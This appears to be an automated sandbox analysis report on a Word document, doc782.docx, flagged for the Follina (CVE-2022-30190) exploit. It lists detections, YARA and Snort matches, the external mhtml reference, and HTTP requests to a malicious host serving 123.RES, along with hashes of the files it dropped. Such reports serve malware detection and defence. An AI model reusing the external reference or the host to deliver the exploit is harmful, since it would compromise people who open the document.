Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:	doc782.docx
Analysis ID:	640940
MD5:	e7015438268464cedad98b1544d643ad
SHA1:	03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:	d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Infos:

Detection

Follina CVE-2022-30190

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Snort IDS alert for network traffic

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: doc782.docx	Virustotal: Detection: 27%			Perma Link
Source: doc782.docx	ReversingLabs: Detection: 17%

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, type: DROPPED

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 185.234.247.119:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 185.234.247.119:80

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119

Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	String found in binary or memory: http://185.2
Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	String found in binary or memory: http://185.234.247.119/123.RES
Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	String found in binary or memory: http://185.234.247.119/123.RESyX
Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	String found in binary or memory: http://185.234.247.119:80/123.RES

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: doc782.docx	Virustotal: Detection: 27%
Source: doc782.docx	ReversingLabs: Detection: 17%

Source: doc782.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\doc782.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$doc782.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5743.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/18@0/1

Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.234.247.119	unknown	Russian Federation		198004	INTERKONEKT-ASPL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.234.247.119/123.RES	true	Avira URL Cloud: safe	unknown

ID:	640940
Product:	CloudBasic
Start time:	19:43:37
Start date:	07.06.2022
Sample:	doc782.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	e7015438268464cedad98b1544d643ad
SHA1:	03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:	d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 49.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD	data	526A6E497879064B79111F0EB079DC69	A0C1A4BA670B7640F1373BE69695CBB8D29602EF	BE1B8CE88A7FC126829F25E065A41BB623E975860C50196F9DEA860CA5683A48
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{90C60528-C98F-4BCE-9AB0-F5E79340A27B}.FSD	data	121BD5A641D1017667991A6BED089C9D	C24150EEA5B9FAAF4EA85883F4A2010E848F1258	8B2A4158CC6A2D08336F295074C4722095EFDE1513079CA76C7DCDDCD0CF40C6
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF	data	CCB1ED79CC6852066844CFAB96D39ED6	4D72D31AF6234AECC4EE48EFF6E3BEAE916EF0BD	89EE3B6935806462AD3FD99A239D72CBCED744D8EF1506C3240FA0E916A8555B
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD	data	317DE8F3926F423F05DF5364DB71FEE7	DB169996DE45337D8A0C1A97B0EC5DAEA96D2A4C	D6F1A882FCD48BF3D86FA004105B84A1BEC310411E6BAA7C444E63414F2308FA
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4A9BEEDA-1620-41EC-85E7-8F2F9F4B21C8}.FSD	data	9D421CB4E95C534AFA4DF087D46B16C6	A552DBB3209497D1246753410028BC8AA300BE05	DD78DDB4B96B4CEAFDCB4FC5720419CAB5F873AC58E3CC4350F94C9B6B2E348E
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF	data	FF0683B5DA4293A1DE54EDCB8D4E8C1A	58322D98937093F90642D2220C7A4A1318A4629B	30434BFC15C74DFA64C6C8DB56C4118A9D99D913B6578D04A1825DF5CF27B2DF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES	HTML document, ASCII text, with very long lines, with CRLF line terminators	A32050027AEA96B3B70E1056490A98C9	EF28C67583C8C8048C0BAAEAD036680A60441213	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES	HTML document, ASCII text, with very long lines, with CRLF line terminators	A32050027AEA96B3B70E1056490A98C9	EF28C67583C8C8048C0BAAEAD036680A60441213	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES	HTML document, ASCII text, with very long lines, with CRLF line terminators	A32050027AEA96B3B70E1056490A98C9	EF28C67583C8C8048C0BAAEAD036680A60441213	E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp	Composite Document File V2 Document, Cannot read section info	3AB3539B70A9B80798F3669AC3483546	346E40AF0E4E582BD90E166E57A8B3A170AC4565	5DBE81D54C8C3CF70075824A503914BC1C8240574AA22AB7C7B7BC63E1DDD654
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77318D9D-F0AF-4DD2-B489-88A56CEFB392}.tmp	data	645EA66E0489C4D8B0D4877F7A930E07	2961C4A1FDD07A4A6EFA47655C6087EB011B079E	ED0BFA2837448DD790D7C0450339FBAEF480535517847634136BF9F7F0B91468
C:\Users\user\AppData\Local\Temp\{99E1AFB0-685D-4B38-97F2-71EBFEEE2F14}	data	B0EA46CCC2FA72CDEA1E8A970318C8C5	E8BB6DFCD4C726B015778B573CE00F8A98D190F7	85EA4C6C1662274426EAFFE8C190A6F109D86DDF4021D8E4A9E3198F36A551A4
C:\Users\user\AppData\Local\Temp\{BC1313D8-3C5B-4901-A926-7D9B949D287F}	data	10E67C048099C90E1C0666278470E38A	D5A7F4B209F9732FB77E86F8A668E1512D66C2DB	D8392841A423C66EA19FB60EA4E550FD547DE47B6A66521A05CB3FCFC5E83492
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:52 2022, mtime=Tue Mar 8 15:45:52 2022, atime=Wed Jun 8 01:45:12 2022, length=10144, window=hide	04594E11A8EF65860D389E40AB032796	AA6792F586717AD57B20FD67B505E50D5AE0E5A3	1BC5F3C148CE6BAFA95337883CC3B042968CD04F3BF61453FC99D46199056D8B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	538F5016C24249AC1799BBBB20B4BD97	1B0ECD98E7D3BFECA78B00528138FA8D84F35BED	249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	C5E24006AFAC8C2659023AD09A07EB0F	4B7B834BEDADFD0A2764743E021D40C55A51F284	7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
C:\Users\user\Desktop\~$doc782.docx	data	C5E24006AFAC8C2659023AD09A07EB0F	4B7B834BEDADFD0A2764743E021D40C55A51F284	7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E

Windows Analysis Report
doc782.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report doc782.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
doc782.docx